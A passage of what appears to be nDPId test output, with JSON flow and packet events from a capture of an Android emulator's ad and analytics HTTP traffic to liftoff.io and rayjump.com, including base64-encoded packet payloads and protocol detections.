{"hostname":"click.liftoff.io","url":"click.liftoff.io\/v1\/campaign_click\/ddfWbX-c_ZpIF_3wE-XgJSwRJPn_5OpS9IR6X4XG91XQL6ssRLV4QPLSEQgWyRbP_OAHXGp-3z8zKxdRjL-BT6h7z46z4qmAWxR5DboEhr1DytY4W5gfQLUcV6yE3POR7PrQlrVbVtH-7uW1oie-jkR4naGHTVVHKv5kFXBJ9yTIX-JngaE2MMTER1HuBx9qTlyLhiZCtWSUSv4Ze5z4QuGqjWijD0QBgAo00Wtj4VqQypzCho_p-UzOrVF8wX9LmysoZ3202xt-1RlmBNXddH_i_evO5yZGpOvG8ktdiKfhG7cddZTR6o5lyR15wY-SJTSM3ffr4dspVSFx6XdnXgfUtxY80spI9tmFMhT97KSC4cMkRv-AyNLWhDaD33WCpU7HN-VnTuM0zl4WQMna-AVBk1Ho0vhTz5ZBU32OhTf9uAkGNxuNj5w5Ifg1GnMwZxKis8J3Z6Z5mtc7gire0eQeDQ7ehtCMFLs0M1aXGE8mHhoANg_w0Ahx43Mu7zvDXSCthH8D4QhHaWoRSuGUgfBDYLzrD8LXz6qHILoQNjj8ieRBLfH22UewVLgMF7dqhXgl73VqgU1_cu-GIfsbBm90zhfd9eoo8rQfdJF2xczqvrQz6-I4FA?vast_el=1","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 11; sdk_gphone_x86 Build\/RSR1.201013.001; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/83.0.4103.106 Mobile Safari\/537.36"}} +01594{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2530,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":195,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385232040,"flow_last_seen":1654385232040,"flow_idle_time":7580000,"flow_min_l4_payload_len":927,"flow_max_l4_payload_len":927,"flow_tot_l4_payload_len":927,"flow_avg_l4_payload_len":927,"midstream":1,"thread_ts_msec":1654385232040,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"3.122.190.70","src_port":33042,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.AmazonAWS","breed":"Acceptable","category":"Cloud"},"http": {"hostname":"click.liftoff.io","url":"click.liftoff.io\/v1\/campaign_click\/ddfWbX-c_ZpIF_3wE-XgJSwRJPn_5OpS9IR6X4XG91XQL6ssRLV4QPLSEQgWyRbP_OAHXGp-3z8zKxdRjL-BT6h7z46z4qmAWxR5DboEhr1DytY4W5gfQLUcV6yE3POR7PrQlrVbVtH-7uW1oie-jkR4naGHTVVHKv5kFXBJ9yTIX-JngaE2MMTER1HuBx9qTlyLhiZCtWSUSv4Ze5z4QuGqjWijD0QBgAo00Wtj4VqQypzCho_p-UzOrVF8wX9LmysoZ3202xt-1RlmBNXddH_i_evO5yZGpOvG8ktdiKfhG7cddZTR6o5lyR15wY-SJTSM3ffr4dspVSFx6XdnXgfUtxY80spI9tmFMhT97KSC4cMkRv-AyNLWhDaD33WCpU7HN-VnTuM0zl4WQMna-AVBk1Ho0vhTz5ZBU32OhTf9uAkGNxuNj5w5Ifg1GnMwZxKis8J3Z6Z5mtc7gire0eQeDQ7ehtCMFLs0M1aXGE8mHhoANg_w0Ahx43Mu7zvDXSCthH8D4QhHaWoRSuGUgfBDYLzrD8LXz6qHILoQNjj8ieRBLfH22UewVLgMF7dqhXgl73VqgU1_cu-GIfsbBm90zhfd9eoo8rQfdJF2xczqvrQz6-I4FA?vast_el=1","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 11; sdk_gphone_x86 Build\/RSR1.201013.001; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/83.0.4103.106 Mobile Safari\/537.36"}} 01362{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2531,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":194,"flow_packet_id":2,"flow_last_seen":1654385232057,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":734,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":734,"pkt_l4_len":700,"thread_ts_msec":1654385232057,"pkt":"nLbQ0+MztKXvZygQCABFAALQp5AAAHsGFQqs2RCOwKgCfgBQ0KgyOulwVgMWtYAYAQXuwwAAAQEICvP9QcDlixteSFRUUC8xLjEgMzAxIE1vdmVkIFBlcm1hbmVudGx5DQpDb250ZW50LVR5cGU6IGFwcGxpY2F0aW9uL2JpbmFyeQ0KQ2FjaGUtQ29udHJvbDogbm8tY2FjaGUsIG5vLXN0b3JlLCBtYXgtYWdlPTAsIG11c3QtcmV2YWxpZGF0ZQ0KUHJhZ21hOiBuby1jYWNoZQ0KRXhwaXJlczogTW9uLCAwMSBKYW4gMTk5MCAwMDowMDowMCBHTVQNCkRhdGU6IFNhdCwgMDQgSnVuIDIwMjIgMjM6Mjc6MTIgR01UDQpMb2NhdGlvbjogaHR0cHM6Ly9wbGF5Lmdvb2dsZS5jb20vc3RvcmUvYXBwcy9kZXRhaWxzP2lkPWNvbS5hemFybGl2ZS5hbmRyb2lkJnJlZmVycmVyPWFkanVzdF9leHRlcm5hbF9jbGlja19pZCUzRHYuMl9nLjE0Mzg0NV9hLmY4NGY1NGJmLTMxY2QtNDNmZi1iZDI3LTUyNmNjYzY0NTdkYV9jLjExN190LnVhX3UuZTdkZjg3MjQ3Y2JjZWExMyUyNnV0bV9jYW1wYWlnbiUzRFRlc3QlMkJDYW1wYWlnbiUyNnV0bV9jb250ZW50JTNEVGVzdCUyQlNvdXJjZSUyQkFwcF8xMjM0NTY3ODklMjZ1dG1fc291cmNlJTNETGlmdG9mZiUyNnV0bV90ZXJtJTNEVGVzdCUyQkNyZWF0aXZlDQpTZXJ2ZXI6IEVTRg0KQ29udGVudC1MZW5ndGg6IDANClgtWFNTLVByb3RlY3Rpb246IDANClgtRnJhbWUtT3B0aW9uczogU0FNRU9SSUdJTg0KWC1Db250ZW50LVR5cGUtT3B0aW9uczogbm9zbmlmZg0KDQo="} 01272{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2532,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":195,"flow_packet_id":2,"flow_last_seen":1654385232085,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":664,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":664,"pkt_l4_len":630,"thread_ts_msec":1654385232085,"pkt":"nLbQ0+MztKXvZygQCABFAAKKs5NAAPUGSvMDer5GwKgCfgBQgRKT0VdXkWADEoAYAHGvxgAAAQEICk9CmDyWJWeOSFRUUC8xLjEgMjAwIE9LDQpEYXRlOiBTYXQsIDA0IEp1biAyMDIyIDIzOjI3OjEyIEdNVA0KQ29udGVudC1UeXBlOiBpbWFnZS9wbmcNCkNvbnRlbnQtTGVuZ3RoOiA3MA0KQ29ubmVjdGlvbjoga2VlcC1hbGl2ZQ0KU2V0LUNvb2tpZTogQVdTQUxCPWdzUk5HU1NhK09YcDJjZTBNNk51U0FjaTJXM3JYSFVtcXNKcnFZNkdFcGtsTUNzaEc2bnU5Y0l6eS9iQXJIU0NPeElRL0ZneTJrZDFNY0RyZVMwQ0d3S2Y0NlJRbERuL2JnMXFELzJWSitGYnJ4U1NNU2RCQ1lKV1N2cms7IEV4cGlyZXM9U2F0LCAxMSBKdW4gMjAyMiAyMzoyNzoxMiBHTVQ7IFBhdGg9Lw0KU2V0LUNvb2tpZTogQVdTQUxCQ09SUz1nc1JOR1NTYStPWHAyY2UwTTZOdVNBY2kyVzNyWEhVbXFzSnJxWTZHRXBrbE1Dc2hHNm51OWNJenkvYkFySFNDT3hJUS9GZ3kya2QxTWNEcmVTMENHd0tmNDZSUWxEbi9iZzFxRC8yVkorRmJyeFNTTVNkQkNZSldTdnJrOyBFeHBpcmVzPVNhdCwgMTEgSnVuIDIwMjIgMjM6Mjc6MTIgR01UOyBQYXRoPS87IFNhbWVTaXRlPU5vbmUNCg0KiVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVR42mNk+P+\/HgAFhAJ\/wlseKgAAAABJRU5ErkJggg=="} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2533,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":196,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385232158,"flow_last_seen":1654385232158,"flow_idle_time":7580000,"flow_min_l4_payload_len":253,"flow_max_l4_payload_len":253,"flow_tot_l4_payload_len":253,"flow_avg_l4_payload_len":253,"midstream":1,"thread_ts_msec":1654385232158,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"8.209.112.118","src_port":35426,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00794{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2533,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":196,"flow_packet_id":1,"flow_last_seen":1654385232158,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":307,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":307,"pkt_l4_len":273,"thread_ts_msec":1654385232158,"pkt":"tKXvZygQnLbQ0+MzCABFAAElDRhAAEAG8E3AqAJ+CNFwdopiAFAUf4ZSerS+DlAYAfY9hQAAUE9TVCAvIEhUVFAvMS4xDQpDb250ZW50LVR5cGU6IGFwcGxpY2F0aW9uL3gtd3d3LWZvcm0tdXJsZW5jb2RlZA0KQ2hhcnNldDogVVRGLTgNClJhbmdlOiBieXRlcz0wLQ0KQ29udGVudC1MZW5ndGg6IDIxOTkNCkhvc3Q6IGFuYWx5dGljcy5yYXlqdW1wLmNvbQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogQXBhY2hlLUh0dHBDbGllbnQvVU5BVkFJTEFCTEUgKGphdmEgMS40KQ0KQWNjZXB0LUVuY29kaW5nOiBnemlwDQoNCg=="} -00802{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2533,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":196,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385232158,"flow_last_seen":1654385232158,"flow_idle_time":7580000,"flow_min_l4_payload_len":253,"flow_max_l4_payload_len":253,"flow_tot_l4_payload_len":253,"flow_avg_l4_payload_len":253,"midstream":1,"thread_ts_msec":1654385232158,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"8.209.112.118","src_port":35426,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"analytics.rayjump.com","url":"analytics.rayjump.com\/","code":0,"content_type":"","user_agent":"Apache-HttpClient\/UNAVAILABLE (java 1.4)"}} +00802{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2533,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":196,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385232158,"flow_last_seen":1654385232158,"flow_idle_time":7580000,"flow_min_l4_payload_len":253,"flow_max_l4_payload_len":253,"flow_tot_l4_payload_len":253,"flow_avg_l4_payload_len":253,"midstream":1,"thread_ts_msec":1654385232158,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"8.209.112.118","src_port":35426,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"analytics.rayjump.com","url":"analytics.rayjump.com\/","code":0,"content_type":"","user_agent":"Apache-HttpClient\/UNAVAILABLE (java 1.4)"}} 02385{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2534,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":196,"flow_packet_id":2,"flow_last_seen":1654385232158,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1498,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1498,"pkt_l4_len":1464,"thread_ts_msec":1654385232158,"pkt":"tKXvZygQnLbQ0+MzCABFAAXMDRlAAEAG66XAqAJ+CNFwdopiAFAUf4dPerS+DlAQAfZCLAAAcGxhdGZvcm09MSZvc192ZXJzaW9uPTMwJnBhY2thZ2VfbmFtZT1jb20uc2NlbmV3YXkua2Fua2FuJmFwcF92ZXJzaW9uX25hbWU9Mi44LjIuMSZvcmllbnRhdGlvbj0yJmJyYW5kPWdvb2dsZSZtb2RlbD1zZGtfZ3Bob25lX3g4NiZnYWlkPTVhYzZhMGZmLThkMTgtNDdiYy1hOTAyLTI4MTJjZjBjMjUxZSZtbmM9Jm1jYz0mbmV0d29ya190eXBlPTkmbmV0d29ya19zdHI9Jmxhbmd1YWdlPWVuJnRpbWV6b25lPUdNVCUyNTJCMDElMjUzQTAwJnVhPU1vemlsbGElMjUyRjUuMCUyQiUyNTI4TGludXglMjUzQiUyQkFuZHJvaWQlMkIxMSUyNTNCJTJCc2RrX2dwaG9uZV94ODYlMkJCdWlsZCUyNTJGUlNSMS4yMDEwMTMuMDAxJTI1M0IlMkJ3diUyNTI5JTJCQXBwbGVXZWJLaXQlMjUyRjUzNy4zNiUyQiUyNTI4S0hUTUwlMjUyQyUyQmxpa2UlMkJHZWNrbyUyNTI5JTJCVmVyc2lvbiUyNTJGNC4wJTJCQ2hyb21lJTI1MkY4My4wLjQxMDMuMTA2JTJCTW9iaWxlJTJCU2FmYXJpJTI1MkY1MzcuMzYmc2RrX3ZlcnNpb249TUFMXzguNy40JmdwX3ZlcnNpb249MjIuNC4yNS0yMSUyQiUyNTVCMCUyNTVEJTJCJTI1NUJQUiUyNTVEJTJCMzM3OTU5NDA1Jmdwc3Y9MTI0NTEwMDAmc2NyZWVuX3NpemU9MTc5NHgxMDgwJmR2aT00Qnp0WXJ4QllGUTMlMkJGUTNSVUUwRFVRUWlVbGJmQURBZm54M2lVVlBIWnpLJmFwcF9pZD0zMjQ1NiZkYXRhPXJpZCUyNTNENjI5YmVhMjBhNGU1NDEwMDAxZjAxYzd4JTI1MjZuZXR3b3JrX3R5cGUlMjUzRDklMjUyNm5ldHdvcmtfc3RyJTI1M0QlMjUyNmNpZCUyNTNEMTk5NDQzNjUyOTklMjUyNmNsaWNrX3R5cGUlMjUzRDElMjUyNnR5cGUlMjUzRDElMjUyNmNsaWNrX2R1cmF0aW9uJTI1M0QxNjUlMjUyNmtleSUyNTNEMjAwMDAxMyUyNTI2dW5pdF9pZCUyNTNEODg4MSUyNTI2bGFzdF91cmwlMjUzRGh0dHBzJTI1MjUzQSUyNTI1MkYlMjUyNTJGcGxheS5nb29nbGUuY29tJTI1MjUyRnN0b3JlJTI1MjUyRmFwcHMlMjUyNTJGZGV0YWlscyUyNTI1M0ZpZCUyNTI1M0Rjb20uYXphcmxpdmUuYW5kcm9pZCUyNTI1MjZyZWZlcnJlciUyNTI1M0RhZGp1c3RfZXh0ZXJuYWxfY2xpY2tfaWQlMjUyNTI1M0R2LjJfZy4xNDM4NDVfYS5mODRmNTRiZi0zMWNkLTQzZmYtYmQyNy01MjZjY2M2NDU3ZGFfYy4xMTdfdC51YV91LmU3ZGY4NzI0N2NiY2VhMTMlMjUyNTI1MjZ1dG1fY2FtcGFpZ24lMjUyNTI1M0RUZXN0JTI1MjUyNTJCQ2FtcGFpZ24lMjUyNTI1MjZ1dG1fY29udGVudCUyNTI1MjUzRFRlc3QlMjUyNTI1MkJTb3VyY2UlMjUyNTI1MkJBcHBfMTIzNDU2Nzg5JTI1MjUyNTI2dXRtX3NvdXJjZSUyNTI1MjUzRExpZnRvZmYlMjUyNTI1MjZ1dG1fdGVybSUyNTI1MjUzRFRlc3QlMjUyNTI1MkJDcmVhdGl2ZSUyNTI2Y29udGVudCUyNTNEbnVsbCUyNTI2Y29kZSUyNTNEMzAxJTI1MjZleGNlcHRpb24lMjUzRG51bGwlMjUyNmhlYWRlciUyNQ=="} 00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2535,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":196,"flow_packet_id":3,"flow_last_seen":1654385232158,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1654385232158,"pkt":"tKXvZygQnLbQ0+MzCABFAAA4DRpAAEAG8TjAqAJ+CNFwdopiAFAUf4zzerS+DlAYAfY8mAAAM0RzdGF0dXNDb2RlJTI1Mg=="} 01707{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2542,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":195,"flow_packet_id":3,"flow_last_seen":1654385234215,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":993,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":993,"pkt_l4_len":959,"thread_ts_msec":1654385234215,"pkt":"tKXvZygQnLbQ0+MzCABFAAPTG5hAAEAGlqbAqAJ+A3q+RoESAFCRYAMSk9FZrYAYAfWIrAAAAQEICpYlcA1PQpg8R0VUIC92MS9jYW1wYWlnbl9jbGljay9kZGZXYlgtY19acElGXzN3RS1YZ0pTd1JKUG5fNU9wUzlJUjZYNFhHOTFYUUw2c3NSTFY0UVBMU0VRZ1d5UmJQX09BSFhHcC0zejh6S3hkUmpMLUJUNmg3ejQ2ejRxbUFXeFI1RGJvRWhyMUR5dFk0VzVnZlFMVWNWNnlFM1BPUjdQclFsclZiVnRILTd1VzFvaWUtamtSNG5hR0hUVlZIS3Y1a0ZYQko5eVRJWC1KbmdhRTJNTVRFUjFIdUJ4OXFUbHlMaGlaQ3RXU1VTdjRaZTV6NFF1R3FqV2lqRDBRQmdBbzAwV3RqNFZxUXlwekNob19wLVV6T3JWRjh3WDlMbXlzb1ozMjAyeHQtMVJsbUJOWGRkSF9pX2V2TzV5WkdwT3ZHOGt0ZGlLZmhHN2NkZFpUUjZvNWx5UjE1d1ktU0pUU00zZmZyNGRzcFZTRng2WGRuWGdmVXR4WTgwc3BJOXRtRk1oVDk3S1NDNGNNa1J2LUF5TkxXaERhRDMzV0NwVTdITi1WblR1TTB6bDRXUU1uYS1BVkJrMUhvMHZoVHo1WkJVMzJPaFRmOXVBa0dOeHVOajV3NUlmZzFHbk13WnhLaXM4SjNaNlo1bXRjN2dpcmUwZVFlRFE3ZWh0Q01GTHMwTTFhWEdFOG1IaG9BTmdfdzBBaHg0M011N3p2RFhTQ3RoSDhENFFoSGFXb1JTdUdVZ2ZCRFlMenJEOExYejZxSElMb1FOamo4aWVSQkxmSDIyVWV3VkxnTUY3ZHFoWGdsNzNWcWdVMV9jdS1HSWZzYkJtOTB6aGZkOWVvbzhyUWZkSkYyeGN6cXZyUXo2LUk0RkE\/dmFzdF9lbD0yIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMCAoTGludXg7IEFuZHJvaWQgMTE7IHNka19ncGhvbmVfeDg2IEJ1aWxkL1JTUjEuMjAxMDEzLjAwMTsgd3YpIEFwcGxlV2ViS2l0LzUzNy4zNiAoS0hUTUwsIGxpa2UgR2Vja28pIFZlcnNpb24vNC4wIENocm9tZS84My4wLjQxMDMuMTA2IE1vYmlsZSBTYWZhcmkvNTM3LjM2DQpBY2NlcHQtRW5jb2Rpbmc6IGd6aXANCkhvc3Q6IGNsaWNrLmxpZnRvZmYuaW8NCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} 00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2544,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":197,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385235892,"flow_last_seen":1654385235892,"flow_idle_time":7580000,"flow_min_l4_payload_len":1229,"flow_max_l4_payload_len":1229,"flow_tot_l4_payload_len":1229,"flow_avg_l4_payload_len":1229,"midstream":1,"thread_ts_msec":1654385235892,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"18.64.79.64","src_port":51686,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 02113{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2544,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":197,"flow_packet_id":1,"flow_last_seen":1654385235892,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1295,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1295,"pkt_l4_len":1261,"thread_ts_msec":1654385235892,"pkt":"tKXvZygQnLbQ0+MzCABFAAUBYktAAEAGrwXAqAJ+EkBPQMnmAFARWCNCXMPM5oAYAfYpmgAAAQEICr8GCEOu2uHSR0VUIC9vcGVuYXBpL2FkL3YzP2FwcF9pZD0zMjQ1NiZ1bml0X2lkPTg4ODEmc2lnbj0zYzI4ZGVkMDRlMGY0MDkwMjI5OTY4NjE4MjQ0YjU4MyZyZXFfdHlwZT0zJmFkX251bT0yMCZ0bnVtPTEmb25seV9pbXByZXNzaW9uPTEmcGluZ19tb2RlPTEmdHRjX2lkcz0lNUIlNUQmZGlzcGxheV9jaWRzPSU1QjE5OTQ0MzY1Mjk5JTVEJmV4Y2x1ZGVfaWRzPSU1QjE5OTQ0MzY1Mjk5JTVEJmFkX3NvdXJjZV9pZD0xJnNlc3Npb25faWQ9NjI5YmVhMjBhNGU1NDEwMDAxMGYwMWM4JmFkX3R5cGU9OTQmb2Zmc2V0PTAmY2hhbm5lbD0mcGxhdGZvcm09MSZvc192ZXJzaW9uPTExJnBhY2thZ2VfbmFtZT1jb20uc2NlbmV3YXkua2Fua2FuJmFwcF92ZXJzaW9uX25hbWU9Mi44LjIuMSZhcHBfdmVyc2lvbl9jb2RlPTE0NiZvcmllbnRhdGlvbj0xJm1vZGVsPXNka19ncGhvbmVfeDg2JmJyYW5kPWdvb2dsZSZnYWlkPTVhYzZhMGZmLThkMTgtNDdiYy1hOTAyLTI4MTJjZjBjMjUxZSZtbmM9Jm1jYz0mbmV0d29ya190eXBlPTkmbmV0d29ya19zdHI9Jmxhbmd1YWdlPWVuJnRpbWV6b25lPUdNVCUyQjAxJTNBMDAmdXNlcmFnZW50PU1vemlsbGElMkY1LjAlMjAlMjhMaW51eCUzQiUyMEFuZHJvaWQlMjAxMSUzQiUyMHNka19ncGhvbmVfeDg2JTIwQnVpbGQlMkZSU1IxLjIwMTAxMy4wMDElM0IlMjB3diUyOSUyMEFwcGxlV2ViS2l0JTJGNTM3LjM2JTIwJTI4S0hUTUwlMkMlMjBsaWtlJTIwR2Vja28lMjklMjBWZXJzaW9uJTJGNC4wJTIwQ2hyb21lJTJGODMuMC40MTAzLjEwNiUyME1vYmlsZSUyMFNhZmFyaSUyRjUzNy4zNiZzZGtfdmVyc2lvbj1NQUxfOC43LjQmZ3BfdmVyc2lvbj0yMi40LjI1LTIxJTIwJTVCMCU1RCUyMCU1QlBSJTVEJTIwMzM3OTU5NDA1JnNjcmVlbl9zaXplPTEwODB4MTc5NCZpc19jbGV2ZXI9MiZ2ZXJzaW9uX2ZsYWc9MSZjYWNoZTE9NjI0MCZjYWNoZTI9NTM2NSZwb3dlcl9yYXRlPTEwMCZjaGFyZ2luZz0wJnN1Yl9pcD0xMC4wLjIuMTYmZHZpPTRCenRZcnhCWUZRMyUyQkZRM1JVRTBEVVFRaVVsYmZBREFmbngzaVVWUEhaUnNScmZ1SG9SMVJVdjA2TiUzRCUzRCZhcGlfdmVyc2lvbj0xLjMgSFRUUC8xLjENCkNoYXJzZXQ6IFVURi04DQpIb3N0OiBuZXQucmF5anVtcC5jb20NCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IEFwYWNoZS1IdHRwQ2xpZW50L1VOQVZBSUxBQkxFIChqYXZhIDEuNCkNCkFjY2VwdC1FbmNvZGluZzogZ3ppcA0KDQo="} -01877{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2544,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":197,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385235892,"flow_last_seen":1654385235892,"flow_idle_time":7580000,"flow_min_l4_payload_len":1229,"flow_max_l4_payload_len":1229,"flow_tot_l4_payload_len":1229,"flow_avg_l4_payload_len":1229,"midstream":1,"thread_ts_msec":1654385235892,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"18.64.79.64","src_port":51686,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.AmazonAWS","breed":"Acceptable","category":"Cloud"},"http": {"hostname":"net.rayjump.com","url":"net.rayjump.com\/openapi\/ad\/v3?app_id=32456&unit_id=8881&sign=3c28ded04e0f4090229968618244b583&req_type=3&ad_num=20&tnum=1&only_impression=1&ping_mode=1&ttc_ids=%5B%5D&display_cids=%5B19944365299%5D&exclude_ids=%5B19944365299%5D&ad_source_id=1&session_id=629bea20a4e54100010f01c8&ad_type=94&offset=0&channel=&platform=1&os_version=11&package_name=com.sceneway.kankan&app_version_name=2.8.2.1&app_version_code=146&orientation=1&model=sdk_gphone_x86&brand=google&gaid=5ac6a0ff-8d18-47bc-a902-2812cf0c251e&mnc=&mcc=&network_type=9&network_str=&language=en&timezone=GMT%2B01%3A00&useragent=Mozilla%2F5.0%20%28Linux%3B%20Android%2011%3B%20sdk_gphone_x86%20Build%2FRSR1.201013.001%3B%20wv%29%20AppleWebKit%2F537.36%20%28KHTML%2C%20like%20Gecko%29%20Version%2F4.0%20Chrome%2F83.0.4103.106%20Mobile%20Safari%2F537.36&sdk_version=MAL_8.7.4&gp_version=22.4.25-21%20%5B0%5D%20%5BPR%5D%20337959405&screen_size=1080x1794&is_clever=2&version_flag=1&cache1=6240&cache2=5365&power_rate=100&charging=0&sub_ip=10.0.2.16&dvi=4BztYrxBYFQ3%2BFQ3RUE0DUQQiUlbfADAfnx3iUVPHZRsRrfuHoR1RUv06N%3D%3D&api_version=1.3","code":0,"content_type":"","user_agent":"Apache-HttpClient\/UNAVAILABLE (java 1.4)"}} +01877{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2544,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":197,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385235892,"flow_last_seen":1654385235892,"flow_idle_time":7580000,"flow_min_l4_payload_len":1229,"flow_max_l4_payload_len":1229,"flow_tot_l4_payload_len":1229,"flow_avg_l4_payload_len":1229,"midstream":1,"thread_ts_msec":1654385235892,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"18.64.79.64","src_port":51686,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.AmazonAWS","breed":"Acceptable","category":"Cloud"},"http": {"hostname":"net.rayjump.com","url":"net.rayjump.com\/openapi\/ad\/v3?app_id=32456&unit_id=8881&sign=3c28ded04e0f4090229968618244b583&req_type=3&ad_num=20&tnum=1&only_impression=1&ping_mode=1&ttc_ids=%5B%5D&display_cids=%5B19944365299%5D&exclude_ids=%5B19944365299%5D&ad_source_id=1&session_id=629bea20a4e54100010f01c8&ad_type=94&offset=0&channel=&platform=1&os_version=11&package_name=com.sceneway.kankan&app_version_name=2.8.2.1&app_version_code=146&orientation=1&model=sdk_gphone_x86&brand=google&gaid=5ac6a0ff-8d18-47bc-a902-2812cf0c251e&mnc=&mcc=&network_type=9&network_str=&language=en&timezone=GMT%2B01%3A00&useragent=Mozilla%2F5.0%20%28Linux%3B%20Android%2011%3B%20sdk_gphone_x86%20Build%2FRSR1.201013.001%3B%20wv%29%20AppleWebKit%2F537.36%20%28KHTML%2C%20like%20Gecko%29%20Version%2F4.0%20Chrome%2F83.0.4103.106%20Mobile%20Safari%2F537.36&sdk_version=MAL_8.7.4&gp_version=22.4.25-21%20%5B0%5D%20%5BPR%5D%20337959405&screen_size=1080x1794&is_clever=2&version_flag=1&cache1=6240&cache2=5365&power_rate=100&charging=0&sub_ip=10.0.2.16&dvi=4BztYrxBYFQ3%2BFQ3RUE0DUQQiUlbfADAfnx3iUVPHZRsRrfuHoR1RUv06N%3D%3D&api_version=1.3","code":0,"content_type":"","user_agent":"Apache-HttpClient\/UNAVAILABLE (java 1.4)"}} 01051{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2549,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":197,"flow_packet_id":2,"flow_last_seen":1654385236487,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":500,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":500,"pkt_l4_len":466,"thread_ts_msec":1654385236487,"pkt":"nLbQ0+MztKXvZygQCABFAAHm3ckAAPgGvqESQE9AwKgCfgBQyeZcw8zmEVgoD4AYAIbbsgAAAQEICq7a5CW\/BghDSFRUUC8xLjEgMjAwIE9LDQpDb250ZW50LVR5cGU6IGFwcGxpY2F0aW9uL2pzb247Y2hhcnNldD1VVEYtOA0KQ29udGVudC1MZW5ndGg6IDQ0DQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQpBY2Nlc3MtQ29udHJvbC1BbGxvdy1PcmlnaW46ICoNCkRhdGU6IFNhdCwgMDQgSnVuIDIwMjIgMjM6Mjc6MTYgR01UDQpTZXJ2ZXI6IG5naW54DQpYLUNhY2hlOiBNaXNzIGZyb20gY2xvdWRmcm9udA0KVmlhOiAxLjEgMzU4ODU2ODkyOGU2NzdjZTliY